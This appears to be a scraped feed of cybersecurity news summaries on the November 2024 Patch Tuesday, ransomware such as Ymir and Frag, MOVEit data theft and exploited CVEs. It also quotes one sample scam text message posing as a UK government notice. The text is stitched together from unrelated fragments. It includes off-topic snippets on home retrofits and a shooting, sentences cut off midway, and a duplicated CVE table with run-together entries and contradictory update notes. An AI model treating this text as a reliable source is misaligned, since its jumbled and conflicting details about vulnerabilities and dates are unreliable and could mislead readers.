Microsoft Patch Tuesday security updates for November 2024 fix two actively exploited zero-days Pierluigi Paganini November 13, 2024 November 13, 2024 Microsoft Patch Tuesday security updates for November 2024 addressed 89 vulnerabilities, including two actively exploited zero-day flaws. "Autosummary:
"Cloud Security Lead CIÉ – Córas Iompair Éireann | Ireland | Hybrid – View job details As a Cloud Security Lead, you will ensure the security of CIE’s Azure environment by developing and implementing cloud security strategies and policies. You will safeguard cloud-based data and applications, collaborate with IT teams to integrate cloud security measures, and assess and advise on cloud security configurations. Additionally, you will contribute to security-related design and implementation and work closely … More
The post Cybersecurity jobs available right now: November 12, 2024 appeared first on Help Net Security.
"Autosummary:
Network Security Specialist Taldor | Israel | On-site – View job details As a Network Security Specialist, you will be responsible for access control, device protection, firewall management, IPS, DLP, and the installation, operation, and maintenance of cybersecurity products (including mobile device antivirus). Information Security Specialist – Red Team Operator TD | Canada | Hybrid – View job details As an Information Security Specialist – Red Team Operator, you will provide consultation and advice to partners on a broad range of Technology Controls, Information Security programs, policies, standards, and incidents within your specialized area. Senior Security Engineer – Web Application Firewall (WAF) DraftKings | USA | Remote – View job details As a Senior Security Engineer – Web Application Firewall (WAF), you will manage and enhance security for the CDN and WAF, including DoS/DDoS mitigation, credential-stuffing prevention, and overall cloud security posture improvement. Information Security Engineer (VAPT) NCR Voyix | India | Hybrid – View job details As an Information Security Engineer (VAPT), you will conduct penetration tests on internal and external networks, web applications, mobile applications, APIs, and cloud environments. "While the goal of cybersecurity regulations is to bring order among organizations and ensure they take security and risks seriously, the growing number of regulations has also introduced a considerable set of challenges that organizations and their leaders must address. Sara Behar, Content Manager at YL Ventures, discusses how recent regulatory actions and high-profile legal incidents involving cybersecurity leaders have influenced CISO reporting. Chris Denbigh-White, CSO at Next DLP, discusses how emerging technologies, such as … More
The post Ambitious cybersecurity regulations leave companies in compliance chaos appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"If the brokers are indeed the same actors who deployed the ransomware, this could signal a new trend, creating additional hijacking options without relying on traditional Ransomware-as-a-Service (RaaS) groups," Kaspersky researcher Cristian Souza said. Last month, Secureworks, which is set to be acquired by Sophos early next year, revealed that the number of active ransomware groups has witnessed a 30% year-over-year increase, driven by the emergence of 31 new groups in the ecosystem. "Autosummary:
“We can model all the different options that are available, suitable for your home and your budget, and identify a package of measures,” says Liz Lainé, of Parity Projects, a housing data analysis company, which runs Ecofurb.Improving the energy efficiency of homes is “essential” for decarbonisation, says Gerald Charles, head of housing retrofit at the Centre for Sustainable Energy, but he adds that the current lack of good advice remains a genuine problem.Perseverance during the past three years paid off, however, and the couple’s 1930’s detached house now has improved insulation, a heat pump, and an electric car charging point. "Autosummary:
Image Other examples seen have used other URL shorteners, such as bit.ly, and the scammers behind the campaign have used a variety of different messages to socially engineer unsuspecting users into visiting a phishing site. "Zscaler announced a Zero Trust Segmentation solution to provide a more secure, agile and cost-effective means to connect users, devices, and workloads across and within globally distributed branches, factories, campuses, data centers, and public clouds. While traditional networks, including SD-WAN and site-to-site VPN, have extended enterprise connectivity to branches and clouds, they have also inadvertently accelerated the spread of ransomware. Although firewalls are used to do segmentation on networks, they add complexity, increase costs, and … More
The post Zscaler Zero Trust Segmentation prevents lateral movement from ransomware attacks appeared first on Help Net Security.
"Autosummary:
Zscaler announced a Zero Trust Segmentation solution to provide a more secure, agile and cost-effective means to connect users, devices, and workloads across and within globally distributed branches, factories, campuses, data centers, and public clouds. "Autosummary:
For example, an "impossible travel" alert, which often creates false positives, flags logins from locations that are humanly impossible to reach in a short time (e.g., a New York login followed by one in Singapore five minutes later).By shifting from a front-line detection tool to a post-detection powerhouse, behavioral analytics provides the context needed to distinguish real threats from noise, avoid end-user disruptions, and accelerate response times.Traditional workflows often involve repetitive, manual tasks for each alert, such as digging into historical data, verifying normal patterns, or communicating with end-users. "Autosummary:
Their primary strategy involves hacking SOHO routers and networking devices, such as Netgear ProSAFE firewalls, Cisco RV320s, DrayTek Vigor routers, and Axis IP cameras, to install custom malware that establishes covert communication and proxy channels and maintain persistent access to targeted networks. "Autosummary:
" SlashNext said the tool marks a "dangerous shift in targeted phishing" that could act as a gateway to source code theft, supply chain attacks, and corporate network breaches via compromised developer credentials. "Autosummary:
What makes the new malware stand out is the use of the application of Flutter, a cross-platform application development framework, to embed the primary payload written in Dart, while masquerading as a fully functional Minesweeper game. "Autosummary:
Although the number of vulnerable devices exposed on the public web is significant, D-Link has made it clear in the past [1, 2] that end-of-life (EoL) devices are not covered by updates, even when critical bugs are concerned. "Autosummary:
Windows users can install this update by going into Settings, clicking on Windows Update, and manually performing a "Check for Updates." However, as this update is mandatory, it will automatically start installing in Windows once you check for updates. Windows 10 KB5046613 cumulative update preview Source: BleepingComputer After installing this update, Windows 10 22H2 will be updated to build 19045.5131 and Windows 10 21H2 will be build 19044.5131.Microsoft has released the KB5046613 cumulative update for Windows 10 22H2 and Windows 10 21H2, which includes ten changes and fixes, including the new Microsoft account manager on the Start menu and fixes for multi-function printer issues. "Autosummary:
Tag CVE ID CVE Title Severity .NET and Visual Studio CVE-2024-43499 .NET and Visual Studio Denial of Service Vulnerability Important .NET and Visual Studio CVE-2024-43498 .NET and Visual Studio Remote Code Execution Vulnerability Critical Airlift.microsoft.com CVE-2024-49056 Airlift.microsoft.com Elevation of Privilege Vulnerability Critical Azure CycleCloud CVE-2024-43602 Azure CycleCloud Remote Code Execution Vulnerability Important LightGBM CVE-2024-43598 LightGBM Remote Code Execution Vulnerability Important Microsoft Defender for Endpoint CVE-2024-5535 OpenSSL: CVE-2024-5535 SSL_select_next_proto buffer overread Important Microsoft Edge (Chromium-based) CVE-2024-10826 Chromium: CVE-2024-10826 Use after free in Family Experiences Unknown Microsoft Edge (Chromium-based) CVE-2024-10827 Chromium: CVE-2024-10827 Use after free in Serial Unknown Microsoft Exchange Server CVE-2024-49040 Microsoft Exchange Server Spoofing Vulnerability Important Microsoft Graphics Component CVE-2024-49031 Microsoft Office Graphics Remote Code Execution Vulnerability Important Microsoft Graphics Component CVE-2024-49032 Microsoft Office Graphics Remote Code Execution Vulnerability Important Microsoft Office Excel CVE-2024-49029 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office Excel CVE-2024-49026 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office Excel CVE-2024-49027 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office Excel CVE-2024-49028 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office Excel CVE-2024-49030 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office SharePoint ADV240001 Microsoft SharePoint Server Defense in Depth Update None Microsoft Office Word CVE-2024-49033 Microsoft Word Security Feature Bypass Vulnerability Important Microsoft PC Manager CVE-2024-49051 Microsoft PC Manager Elevation of Privilege Vulnerability Important Microsoft Virtual Hard Drive CVE-2024-38264 Microsoft Virtual Hard Disk (VHDX) Denial of Service Vulnerability Important Microsoft Windows DNS CVE-2024-43450 Windows DNS Spoofing Vulnerability Important Role: Windows Active Directory Certificate Services CVE-2024-49019 Active Directory Certificate Services Elevation of Privilege Vulnerability Important Role: Windows Hyper-V CVE-2024-43633 Windows Hyper-V Denial of Service Vulnerability Important Role: Windows Hyper-V CVE-2024-43624 Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability Important SQL Server CVE-2024-48998 SQL Server Native Client Remote Code Execution VulnerabilitySMBv3 Server Remote Code Execution Vulnerability Important Windows Task Scheduler CVE-2024-49039 Windows Task Scheduler Elevation of Privilege Vulnerability Important Windows Telephony Service CVE-2024-43628 Windows Telephony Service Remote Code Execution Vulnerability Important Windows Telephony Service CVE-2024-43621 Windows Telephony Service Remote Code Execution Vulnerability Important Windows Telephony Service CVE-2024-43620 Windows Telephony Service Remote Code Execution Vulnerability Important Windows Telephony Service CVE-2024-43627 Windows Telephony Service Remote Code Execution Vulnerability Important Windows Telephony Service CVE-2024-43635 Windows Telephony Service Remote Code Execution Vulnerability Important Windows Telephony Service CVE-2024-43622 Windows Telephony Service Remote Code Execution Vulnerability Important Windows Telephony Service CVE-2024-43626 Windows Telephony Service Elevation of Privilege Vulnerability Important Windows Update Stack CVE-2024-43530 Windows Update Stack Elevation of Privilege Vulnerability Important Windows USB Video Driver CVE-2024-43643 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important Windows USB Video Driver CVE-2024-43449 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important Windows USB Video Driver CVE-2024-43637 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important Windows USB Video Driver CVE-2024-43634 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important Windows USB Video Driver CVE-2024-43638 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important Windows VMSwitch CVE-2024-43625 Microsoft Windows VMSwitch Elevation of Privilege Vulnerability Critical Windows Win32 Kernel Subsystem CVE-2024-49046 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important Update 9/11/24: Updated to explain that only three flaws were actively exploited and why CVE-2024-43491 was marked as exploited.Important SQL Server CVE-2024-49002 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49013 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49014 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49011 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49012 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49015 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49018 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49021 Microsoft SQL Server Remote Code Execution Vulnerability Important SQL Server CVE-2024-49016 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49017 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49010 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49005 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49007 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49003 SQL Server Native Client Remote Code Execution Vulnerability "Autosummary:
IOS XE Web UI Command Injection CVE-2023-27997 Fortinet FortiOS/FortiProxy SSL-VPN Heap-Based Buffer Overflow CVE-2023-34362 Progress MOVEit Transfer SQL Injection CVE-2023-22515 Atlassian Confluence Data Center/Server Broken Access Control CVE-2021- 44228 (Log4Shell) Apache Log4j2 Remote Code Execution CVE-2023-2868 Barracuda Networks ESG Appliance Improper Input Validation CVE-2022-47966 Zoho ManageEngine Multiple Products Remote Code Execution CVE-2023-27350 PaperCut MF/NG Improper Access Control CVE-2020-1472 Microsoft Netlogon Privilege Escalation CVE-2023-42793 JetBrains TeamCity Authentication Bypass CVE-2023-23397 Microsoft Office Outlook Privilege Escalation CVE-2023-49103 ownCloud graphapi Information Disclosure CVE-2023-3519, a code injection vulnerability in NetScaler ADC / Gateway that enables attackers to gain remote code execution on unpatched servers, took the first spot after state hackers abused it to breach U.S. critical infrastructure organizations. "Autosummary:
The attack lasted one hour before being mitigated, it impacted multiple companies across Israel, including the Maccabi health fund, taxi service Gett, food ordering app Wolt, and public transportation payment systems Rav Kav Online and Hop-On. "Autosummary:
Ymir ransomware, a new stealthy ransomware grow in the wild Pierluigi Paganini November 12, 2024 November 12, 2024 New Ymir ransomware was deployed in attacks shortly after systems were breached by RustyStealer malware, Kaspersky warns. "Autosummary:
Set the number of cores per socket to a value that ensures the total number of logical processors is 256 or fewer (Important: the total number of logical processors is calculated by first multiplying the number of sockets by the number of cores per socket and then multiplying that result by the number of logical processors per core.) "November 2024 Patch Tuesday is here, and Microsoft has dropped fixes for 89 new security issues in its various products, two of which – CVE-2024-43451 and CVE-2024-49039 – are actively exploited by attackers. The exploited vulnerabilities (CVE-2024-43451, CVE-2024-49039) CVE-2024-43451 is yet another vulnerability that allows attackers to elevate their privileges on targeted Windows and Windows Server machines by disclosing the user’s NTLMv2 hash, which contains their authentication credentials. The hash can then be used by … More
The post Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) appeared first on Help Net Security.
"Autosummary:
Consequently, the attacker could execute commands on any Azure CycleCloud cluster within the instance and, in specific scenarios, compromise administrative credentials,” says Natalie Silva, Lead Cyber Security Engineer at Immersive Labs. “To my knowledge, it’s the third such vulnerability that can disclose a user’s NTLMv2 hash that was exploited in the wild in 2024,” Satnam Narang, Senior Staff Research Engineer at Tenable, told Help Net Security. "Autosummary:
Tag CVE ID CVE Title Severity .NET and Visual Studio CVE-2024-43499 .NET and Visual Studio Denial of Service Vulnerability Important .NET and Visual Studio CVE-2024-43498 .NET and Visual Studio Remote Code Execution Vulnerability Critical Airlift.microsoft.com CVE-2024-49056 Airlift.microsoft.com Elevation of Privilege Vulnerability Critical Azure CycleCloud CVE-2024-43602 Azure CycleCloud Remote Code Execution Vulnerability Important LightGBM CVE-2024-43598 LightGBM Remote Code Execution Vulnerability Important Microsoft Defender for Endpoint CVE-2024-5535 OpenSSL: CVE-2024-5535 SSL_select_next_proto buffer overread Important Microsoft Edge (Chromium-based) CVE-2024-10826 Chromium: CVE-2024-10826 Use after free in Family Experiences Unknown Microsoft Edge (Chromium-based) CVE-2024-10827 Chromium: CVE-2024-10827 Use after free in Serial Unknown Microsoft Exchange Server CVE-2024-49040 Microsoft Exchange Server Spoofing Vulnerability Important Microsoft Graphics Component CVE-2024-49031 Microsoft Office Graphics Remote Code Execution Vulnerability Important Microsoft Graphics Component CVE-2024-49032 Microsoft Office Graphics Remote Code Execution Vulnerability Important Microsoft Office Excel CVE-2024-49029 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office Excel CVE-2024-49026 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office Excel CVE-2024-49027 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office Excel CVE-2024-49028 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office Excel CVE-2024-49030 Microsoft Excel Remote Code Execution Vulnerability Important Microsoft Office SharePoint ADV240001 Microsoft SharePoint Server Defense in Depth Update None Microsoft Office Word CVE-2024-49033 Microsoft Word Security Feature Bypass Vulnerability Important Microsoft PC Manager CVE-2024-49051 Microsoft PC Manager Elevation of Privilege Vulnerability Important Microsoft Virtual Hard Drive CVE-2024-38264 Microsoft Virtual Hard Disk (VHDX) Denial of Service Vulnerability Important Microsoft Windows DNS CVE-2024-43450 Windows DNS Spoofing Vulnerability Important Role: Windows Active Directory Certificate Services CVE-2024-49019 Active Directory Certificate Services Elevation of Privilege Vulnerability Important Role: Windows Hyper-V CVE-2024-43633 Windows Hyper-V Denial of Service Vulnerability Important Role: Windows Hyper-V CVE-2024-43624 Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability Important SQL Server CVE-2024-48998 SQL Server Native Client Remote Code Execution VulnerabilitySMBv3 Server Remote Code Execution Vulnerability Important Windows Task Scheduler CVE-2024-49039 Windows Task Scheduler Elevation of Privilege Vulnerability Important Windows Telephony Service CVE-2024-43628 Windows Telephony Service Remote Code Execution Vulnerability Important Windows Telephony Service CVE-2024-43621 Windows Telephony Service Remote Code Execution Vulnerability Important Windows Telephony Service CVE-2024-43620 Windows Telephony Service Remote Code Execution Vulnerability Important Windows Telephony Service CVE-2024-43627 Windows Telephony Service Remote Code Execution Vulnerability Important Windows Telephony Service CVE-2024-43635 Windows Telephony Service Remote Code Execution Vulnerability Important Windows Telephony Service CVE-2024-43622 Windows Telephony Service Remote Code Execution Vulnerability Important Windows Telephony Service CVE-2024-43626 Windows Telephony Service Elevation of Privilege Vulnerability Important Windows Update Stack CVE-2024-43530 Windows Update Stack Elevation of Privilege Vulnerability Important Windows USB Video Driver CVE-2024-43643 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important Windows USB Video Driver CVE-2024-43449 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important Windows USB Video Driver CVE-2024-43637 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important Windows USB Video Driver CVE-2024-43634 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important Windows USB Video Driver CVE-2024-43638 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important Windows VMSwitch CVE-2024-43625 Microsoft Windows VMSwitch Elevation of Privilege Vulnerability Critical Windows Win32 Kernel Subsystem CVE-2024-49046 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important Update 11/13/24: Changed number of flaws to 89 as we previously included Edge flaws fixed on November 7.Important SQL Server CVE-2024-49002 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49013 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49014 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49011 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49012 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49015 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49018 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49021 Microsoft SQL Server Remote Code Execution Vulnerability Important SQL Server CVE-2024-49016 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49017 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49010 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49005 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49007 SQL Server Native Client Remote Code Execution Vulnerability Important SQL Server CVE-2024-49003 SQL Server Native Client Remote Code Execution Vulnerability "10% of security researchers now specialize in AI technology as 48% of security leaders consider AI to be one of the greatest risks to their organizations, according to HackerOne. HackerOne’s report combines perspectives from the researcher community, customers, and security leaders. It explores how security-focused organizations integrate human expertise with technology and AI for a defense-in-depth strategy. AI is a threat and an opportunity 67% of security professionals said an external and unbiased review of … More
The post How human ingenuity continues to outpace automated security tools appeared first on Help Net Security.
"Autosummary:
30% now hack full-time, up from 24% in 2023, and 44% spend over 20 hours a week hacking, compared to 35% the previous year. "Through their past military service, veterans are trained to think like adversaries, often share that mission-driven spirit and excel when working with a team to achieve a larger goal. They develop and champion the unique traits that cybersecurity companies need in prospective talent. These organizations must take note, as tapping veterans for cybersecurity roles can mutually benefit their business and the individuals they hire. Below, I’ll explain four reasons veterans make excellent cybersecurity company employees. … More
The post 4 reasons why veterans thrive as cybersecurity professionals appeared first on Help Net Security.
"Autosummary:
When training, military members constantly simulate real-world combat situations so that, when the attack is real, they already know how they’ll react.Veterans are always oriented against the threat they face, and cybersecurity, like a combat situation, is one of the only fields that poses a constant quasi-state of attack. "Vulnerability management has been the standard approach to fending off cyber threats for years. Still, it falls short by focusing on a limited number of vulnerabilities, often resolving only 1% to 20% of issues. In 2024, with the average data breach cost rising to $4.88 million, businesses can no longer rely on outdated, reactive practices. Instead, a shift to exposure management is crucial. In this Help Net Security video, Rob Gurzeev, CEO of CyCognito, discusses … More
The post Setting a security standard: From vulnerability to exposure management appeared first on Help Net Security.
"Autosummary:
"Autosummary:
These commands allow the program to harvest files, enumerate and terminate processes, manage system services, edit Windows Registry, execute commands and scripts, capture clipboard content, alter a victim"s desktop wallpaper, enable camera and microphone, download additional payloads, record the screen, and even disable keyboard or mouse input. "Autosummary:
A surge in Pro-Russia cyberattacks after decision to monitor North Korean Troops in Ukraine Pierluigi Paganini November 11, 2024 November 11, 2024 South Korea claims Pro-Russia actors intensified cyberattacks on national sites after it decided to monitor North Korean troops in Ukraine. "Autosummary:
The automated platform has built-in content of TTPs for conducting tests, covering techniques like Kerberoasting, network scanning, brute forcing etc, relieving the team from having to create this.Instead of relying solely on expensive, highly-skilled engineers to carry out manual validations across all systems, we could focus our elite teams on high-value, targeted red-teaming exercises. Watch the full on-demand webinar with Shawn Baird, Associate Director of Offensive Security & Red Teaming at DTCC, and Pentera Field CISO, Jason Mar-Tang. We met with Shawn Baird, Associate Director of Offensive Security & Red Teaming at DTCC, to discuss how to effectively communicate the business value of his Security Validation practices and tools to his upper management. "Autosummary:
"Autosummary:
"Autosummary:
️🔥 Trending CVEs Recently trending CVEs include: CVE-2024-39719, CVE-2024-39720, CVE-2024-39721, CVE-2024-39722, CVE-2024-43093, CVE-2024-10443, CVE-2024-50387, CVE-2024-50388, CVE-2024-50389, CVE-2024-20418, CVE-2024-5910, CVE-2024-42509, CVE-2024-47460, CVE-2024-33661, CVE-2024-33662. Tips for Organizations: Update and Patch Systems: Immediately apply the latest security updates to all edge devices and firewalls, particularly those from Sophos, to mitigate known vulnerabilities like CVE-2020-12271, CVE-2020-15069, CVE-2020-29574, CVE-2022-1040, and CVE-2022-3236. Immediately apply the latest security updates to all edge devices and firewalls, particularly those from Sophos, to mitigate known vulnerabilities like CVE-2020-12271, CVE-2020-15069, CVE-2020-29574, CVE-2022-1040, and CVE-2022-3236.Over 30 Vulnerabilities Found in IBM Security Verify Access: Nearly a three dozen vulnerabilities have been disclosed in IBM Security Verify Access (ISVA) that, if successfully exploited, could allow attackers to escalate privileges, access sensitive information, and compromise the entire authentication infrastructure. An ongoing threat campaign dubbed VEILDrive has been observed taking advantage of legitimate services from Microsoft, including Teams, SharePoint, Quick Assist, and OneDrive, as part of its modus operandi. Nearly a three dozen vulnerabilities have been disclosed in IBM Security Verify Access (ISVA) that, if successfully exploited, could allow attackers to escalate privileges, access sensitive information, and compromise the entire authentication infrastructure.An ongoing threat campaign dubbed VEILDrive has been observed taking advantage of legitimate services from Microsoft, including Teams, SharePoint, Quick Assist, and OneDrive, as part of its modus operandi."India very likely uses its cyber program to advance its national security imperatives, including espionage, counterterrorism, and the country"s efforts to promote its global status and counter narratives against India and the Indian government," the Canadian Centre for Cyber Security said."India very likely uses its cyber program to advance its national security imperatives, including espionage, counterterrorism, and the country"s efforts to promote its global status and counter narratives against India and the Indian government," the Canadian Centre for Cyber Security said." Multiple security vulnerabilities identified in the Mazda Connect Connectivity Master Unit (CMU) infotainment unit (from CVE-2024-8355 through CVE-2024-8360), which is used in several models between 2014 and 2021, could allow for execution of arbitrary code with elevated permissions. "Autosummary:
Company Date Stolen Number of Employees Lenovo 2023-05 45,522 McDonald"s 2023-05 3,295 HP 2023-05 104,119 City National Bank 2023-05 9,358 BT 2023-05 15,347 dsm-firmenich 2023-05 13,248 Rush University 2023-05 15,853 URBN 2023-05 17,553 Westinghouse 2023-05 18,193 UBS 2023-05 20,462 TIAA 2023-05 23,857 OmnicomGroup 2023-05 37,320 Bristol-Myers Squibb 2023-05 37,497 3M 2023-05 48,630 Schwab 2023-05 49,356 Leidos 2023-05 52,610 Canada Post 2023-05 69,860 Amazon 2023-05 2,861,111 Delta 2023-05 57,317 Applied Materials 2023-05 53,170 Cardinal Health 2023-05 407,437 US Bank 2023-05 114,076 fmr.com 2023-05 124,464 HSBC 2023-05 280,693 MetLife 2023-05 585,130 The MOVEit data-theft attacks The Clop ransomware gang was behind a wave of data theft attacks starting on May 27, 2023. "Autosummary:
Ymir is a novel Windows ransomware strain that operates entirely from memory, leveraging functions like "malloc," "memove," and "memcmp," to evade detection. "Autosummary:
According to HIBP, the exposed details include full names, email addresses, dates of birth, phone numbers, physical addresses, purchase history, and partial credit card data for Hot Topic, Box Lunch, and Torrid customers. "Autosummary:
Amazon discloses employee data breach after May 2023 MOVEit attacks Pierluigi Paganini November 11, 2024 November 11, 2024 Amazon disclosed a data breach exposing employee data, with information allegedly stolen in the May 2023 MOVEit attacks. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Millions of Synology NAS devices vulnerable to zero-click attacks (CVE-2024-10443) Synology has released fixes for an unauthenticated “zero-click” remote code execution flaw (CVE-2024-10443, aka RISK:STATION) affecting its popular DiskStation and BeeStation network attached storage (NAS) devices. Google patches actively exploited Android vulnerability (CVE-2024-43093) Google has delivered fixes for two vulnerabilities endangering Android users that “may be under limited, targeted exploitation”: … More
The post Week in review: Zero-click flaw in Synology NAS devices, Google fixes exploited Android vulnerability appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Millions of Synology NAS devices vulnerable to zero-click attacks (CVE-2024-10443) Synology has released fixes for an unauthenticated “zero-click” remote code execution flaw (CVE-2024-10443, aka RISK:STATION) affecting its popular DiskStation and BeeStation network attached storage (NAS) devices. Google patches actively exploited Android vulnerability (CVE-2024-43093) Google has delivered fixes for two vulnerabilities endangering Android users that “may be under limited, targeted exploitation”: CVE-2024-43047, a flaw affecting Qualcomm chipsets, and CVE-2024-43093, a vulnerability in the Google Play framework. "Autosummary:
“ In August, Volexity researchers reported that a China-linked APT group, tracked as StormBamboo (aka Evasive Panda, Daggerfly, and StormCloud), successfully compromised an undisclosed internet service provider (ISP) in order to poison DNS responses for target organizations. Cisco addressed an NX-OS zero-day, tracked as CVE-2024-20399 (CVSS score of 6.0), that the China-linked group Velvet Ant exploited to deploy previously unknown malware as root on vulnerable switches. "Autosummary:
"Autosummary:
"Over the course of its decade-long operation, Bitcoin Fog gained notoriety as a go-to money laundering service for criminals seeking to hide their illicit proceeds from law enforcement and processed transactions involving over 1.2 million bitcoin, valued at approximately $400 million at the time the transactions occurred," the DoJ said. "Autosummary:
Gritzbach, a former member of the PCC, dropped his bag and tried to run away - but he was shot many times and died at the scene. "Autosummary:
Veeam Backup & Replication exploit reused in new Frag ransomware attack Pierluigi Paganini November 09, 2024 November 09, 2024 A critical flaw, tracked as CVE-2024-40711, in Veeam Backup & Replication (VBR) was also recently exploited to deploy Frag ransomware. In a recent attack, threat group STAC 5881 accessed networks via a compromised VPN appliance, exploited a VEEAM vulnerability, and then created accounts named “point” and “point2.” "Autosummary:
The text urges the recipient to click on a link, leading them to a lookalike GOV.UK page: Please note that the government has decided that the Winter heating_allowance and Cost of Living_support for 2024 have been fully implemented, you have met the requirements, please be sure to fill in the application information as soon as possible, we will release the money to you within 3days, please note that check, this will be the last notice to you, the online application channel deadline is November 12.The domain name comprising the phrases, "notices," "gov," and "e" are all likely an attempt, albeit an unrefined one, to make it appear authentic. "Autosummary:
"Autosummary:
" The activity, which has mainly targeted countries like Romania, Poland, Germany, and Kazakhstan, starts with a batch file present within the archive file. "A vulnerability (CVE-2024-5910) in Palo Alto Networks Expedition, a firewall configuration migration tool, is being exploited by attackers in the wild, the Cybersecurity and Infrastructure Security Agency (CISA) confirmed on Thursday. About CVE-2024-5910 Unearthed and reported by Brian Hysell of Synopsys Cybersecurity Research Center (CyRC), CVE-2024-5910 stems from missing authentication for a critical function, which can lead to an Expedition admin account takeover for attackers with network access to the installation. A security update fixing … More
The post Critical Palo Alto Networks Expedition bug exploited (CVE-2024-5910) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Key features of the academy include: Expert guidance from industry experts who share their practical knowledge and experience on a wide range of essential vCISO functions, including risk and compliance assessments, cybersecurity strategy development, and effective communication of risks to executive teams.Journey By addressing the knowledge shortage and providing structured, accessible learning, the vCISO academy allows service providers to: Broaden your perspective: The vCISO Academy provides a deeper understanding of what it means to be a vCISO with specialized training to address the cybersecurity shortage. "Autosummary:
"Autosummary:
What to Expect in the Webinar: Industry experts, Dima Kumets (Principal Product Manager) and James O"Leary (Product Marketing Manager), will guide you through a fresh approach to security training that resonates with users and admins alike. "Autosummary:
According to the report, compromising a car"s infotainment system using the disclosed vulnerabilities could allow database manipulation, information disclosure, creating arbitrary files, injecting arbitrary OS commands that could lead to full compromise of the system, gaining persistence, and executing arbitrary code before the operation system boots. By exploiting CVE-2024-8356, a threat actor could install a malicious firmware version and gain direct access to the connected controller area networks (CAN buses) and reach the vehicle"s electronic control units (ECUs) for the engine, brakes, transmission, or powertrain. "Autosummary:
While CISA didn"t provide more details on these attacks, Horizon3.ai vulnerability researcher Zach Hanley released a proof-of-concept exploit last month that chains it with a command injection vulnerability (tracked as CVE-2024-9464) to gain "unauthenticated" arbitrary command execution on vulnerable Expedition servers. "Autosummary:
Oracle E-Business Suite (EBS) Unauthenticated arbitrary file upload vulnerability CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX21 firmware command injection vulnerability CVE-2024-4577 (CVSS score: 9.8) - PHP CGI argument injection vulnerability CVE-2024-36401 (CVSS score: 9.8) - GeoServer remote code execution vulnerability "The botnet cycles through common administrative usernames and uses a consistent password pattern," the company said. "Autosummary:
iPhones in a law enforcement forensics lab mysteriously rebooted losing their After First Unlock (AFU) state Pierluigi Paganini November 08, 2024 November 08, 2024 Law enforcement warns that securely stored iPhones awaiting forensic examination are mysteriously rebooting, making them harder to unlock, reported 404 Media. "Autosummary:
Frag ransom note (Sophos) "In a recent case MDR analysts once again observed the tactics associated with STAC 5881 – but this time observed the deployment of a previously-undocumented ransomware called "Frag,"" said Sean Gallagher, a principal threat researcher at Sophos X-Ops. "Autosummary:
"The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (hereafter collectively referred to as the authoring agencies):
This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). Malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks in 2023 compared to 2022, allowing them to conduct operations against high priority targets.
The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the following recommendations, and those found within the Mitigations section of this advisory, to reduce the risk of compromise by malicious cyber actors.
Autosummary:
